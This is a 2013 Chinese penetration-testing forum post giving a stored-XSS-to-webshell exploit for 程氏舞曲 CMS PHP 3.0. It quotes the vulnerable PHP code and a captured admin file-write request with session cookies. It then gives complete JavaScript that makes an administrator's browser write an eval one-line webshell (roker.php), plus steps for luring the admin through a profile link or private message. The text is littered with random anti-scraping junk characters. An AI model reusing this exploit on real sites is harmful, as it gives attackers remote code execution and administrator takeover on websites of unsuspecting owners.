中国网络渗透测试联盟

标题: 程氏舞曲CMSPHP3.0 储存型xss getshell [打印本页]
作者: admin    时间: 2013-11-6 18:09
标题: 程氏舞曲CMSPHP3.0 储存型xss getshell
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题8 @& L/ R) w4 g7 ]
官网已经修补了,所以重新下了源码
$ c: N1 A5 p( z  V% _因为 后台登入 还需要认证码 所以 注入就没看了。! }" y+ x' Z, ~1 H
存在 xss
/ p6 \. Y- V' Y: A$ T漏洞文件 user/member/skin_edit.php
! ^4 h5 r: T  v: a* E5 t' t4 a  e本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
! A& Z7 [. j& [7 I5 b4 H1 k  
1 ~0 B& n! ~3 k( ^" _</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
5 h' g3 A2 r/ D2 x) k  7 A. c' P) }# G9 K$ B: i  }
</textarea></td></tr>3 M* X; Z7 B9 e. D0 P2 a+ g
  3 Y; G5 b+ E5 M, k
             user/do.php 6 j4 A5 J$ I; f3 k
+ I1 G& \- q: b+ k5 x! `" `
% a- ^0 l" Z/ B1 f4 j
if($op=='zl'){ //资料/ E2 u) J; z4 |+ ?1 ~1 @; {
  * K" ?8 r% p3 v% F+ {+ d
             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
% Q$ P; I% R$ H6 U) J$ z9 q& t, @             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));' S8 X9 l: R) y& }: U1 i) ^$ g+ z/ I
  . C0 f6 v& _; s9 ^/ a* t- L
             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
3 J; `! Z2 y, T/ Z5 }  . D- U4 Z. s; V9 Z6 s$ b" \
             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."', r& N& M0 g; M% b' _3 E) p5 `0 \
             where CS_Name='".$cscms_name."'";* {* v9 ^% P1 a3 j( }- t: k
  
0 \1 A* }4 ]- S             if($db->query($sql)){
) o* N5 b- N1 R2 i  
7 m( F0 N0 O: M9 Q& L! h, w. y+ L              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));( E( a- M: L6 Z) N2 X- Y4 {0 s$ }
  8 o6 x- p) ^1 t1 C" P. F$ u, @0 S
             }else{. ^& m. k% H3 v3 T  w+ K
  
& g2 c9 d* Q* e7 B              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));( q% z7 `1 e, P, T- W* \3 X- Q5 `
  
* C, d, o/ N. j# \% i" ^; i             }
7 z3 h* \' y1 s  G
" P& A, r5 g9 |8 b8 \
3 ~% ~2 v, B, `) N4 M3 d& ^2 Z没有 过滤导致xss产生。
! g+ @# I" Y) Q后台 看了下 很奇葩的是可以写任意格式文件。。
1 a+ u- c) L& m8 _抓包。。! s: j7 I* f3 K) T) o2 A8 ]
' j/ [* n9 t; B" v6 B

( ]/ X# B: R- o# I本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
  M1 o4 h9 l6 U+ [! e, s; I$ g  6 d( N' o( N# L. V
Accept: text/html, application/xhtml+xml, */*
: t; q, ~9 v, b  4 H& |+ K  w+ P- |% W+ Y' @8 Y
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php& @, \. O' J: d+ E" B# r$ g9 `
  ) g: ]* J% j' n8 S) Z- d+ u4 X  @
Accept-Language: zh-CN
. P% g+ o$ I0 y4 w- _  
# a5 e# \7 }* C2 n. ^User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
  V1 n5 |; ?3 I; ]  ; x6 e  O3 N; }7 ]
Content-Type: application/x-www-form-urlencoded
7 [) J7 @* A5 s% l  6 @# n4 T8 Z0 ]5 r9 l3 F& G
Accept-Encoding: gzip, deflate  i. ~* ]! o" w/ K5 F
  
, K5 y6 }/ d9 LHost: 127.0.0.1
! C3 U0 ~" j. o& K0 A1 l. S" b2 z  
' U' u4 x2 |% d" j7 bContent-Length: 38
) Z6 B  M0 `8 i  2 x/ \# d3 j% J/ h  N: F
DNT: 1" ^2 I; ^4 ^$ F" ]( K3 }4 |4 _
  & H2 q7 Z6 _1 E$ y6 P$ F4 o& V' ]# K
Connection: Keep-Alive. d+ x" |- ^; k! V8 B- r
  . Y* u9 t0 U* v" }+ n2 v
Cache-Control: no-cache
) @4 T: w8 _: N  
0 K$ ~0 l: Q- w. n  l; PCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594" z: k+ d; `- }1 A/ }% O
  ) p- Q* E. d/ c# ], w- b
- f! M. f4 z$ d$ [4 h1 h
name=aaa.php&content=%3Cs%3E%3Ca%25%3E% w* W  V. T5 \, D

4 _: g6 n; F' u" X/ a, E) B5 J% m, @( \
+ `5 ^! ]) U  a- B" S3 ]5 s
于是 构造js如下。3 Q8 ~- F  _0 H
7 r! \, r5 G/ m) E9 X8 l$ B: Y: q$ `
本帖隐藏的内容<script> : t, C/ B/ T% @& F' ?* b
thisTHost = top.location.hostname;. \0 T% P  V+ B' E) y
  ( ^! q1 Y# Y  g: L
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";# b; ~0 U0 W$ E9 g. U! i# s
  
) }! N5 o1 F9 H& ^function PostSubmit(url, data, msg) {
* x( B2 I; d4 t4 n    var postUrl = url;# s2 ?; ~6 A& H; y6 L" V
  & F1 _! g& H& u
    var postData = data; 4 @: f7 c( r7 p1 Q2 F
    var msgData = msg;   `/ [9 U  Z8 p2 ~  _0 g; s
    var ExportForm = document.createElement("FORM");
" ]* P+ G: _- H* `/ P    document.body.appendChild(ExportForm);
) M9 ?# c- o3 Z) t7 H3 I    ExportForm.method = "POST"; 3 x' v3 b" W$ z6 u% |
    var newElement = document.createElement("input");
# f8 C9 Q. Z( l) y" R2 s7 U    newElement.setAttribute("name", "name");
# u1 K& Y9 J$ j- ~. _    newElement.setAttribute("type", "hidden");
+ l& u3 Q3 h: p    var newElement2 = document.createElement("input");
: R0 k/ t7 ?6 _5 X, L0 I    newElement2.setAttribute("name", "content"); . w3 C& E9 Z. T& U! J6 ^
    newElement2.setAttribute("type", "hidden"); 1 W+ U- F" E. g9 R
    ExportForm.appendChild(newElement);
4 T: r3 e7 R" k- h) N4 |    ExportForm.appendChild(newElement2);
0 `; ^  X( x: r& f1 T* E7 g5 x    newElement.value = postData;
( _: O+ b5 \* d8 F8 {; u    newElement2.value = msgData; ) i" E5 m" C. J; d: z
    ExportForm.action = postUrl; ' @% B" E' ?( w. C/ X7 }
    ExportForm.submit(); $ j8 |" i1 X& s& U7 L6 X
};
+ [* h/ H2 u# t7 J0 T  
, x' Z" Y) M0 v0 z8 oPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
. E) t, P7 s6 v6 K  
- l  U( t( O8 t/ }</script>
" J% }+ m" X4 _+ ?' [- h! @, O, W
8 I$ U3 Q$ Y+ {0 ?& H# b' C
* R) e, W) k/ Y$ E2 O. n
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入, P0 n, G$ s* F$ g. |* D$ w
用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)6 }2 r2 y# C2 ^! ]
就会 在 skins\index\html\目录下生成 roker.php 一句话。
4 h) t) N; [/ F- R2 ^  @




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2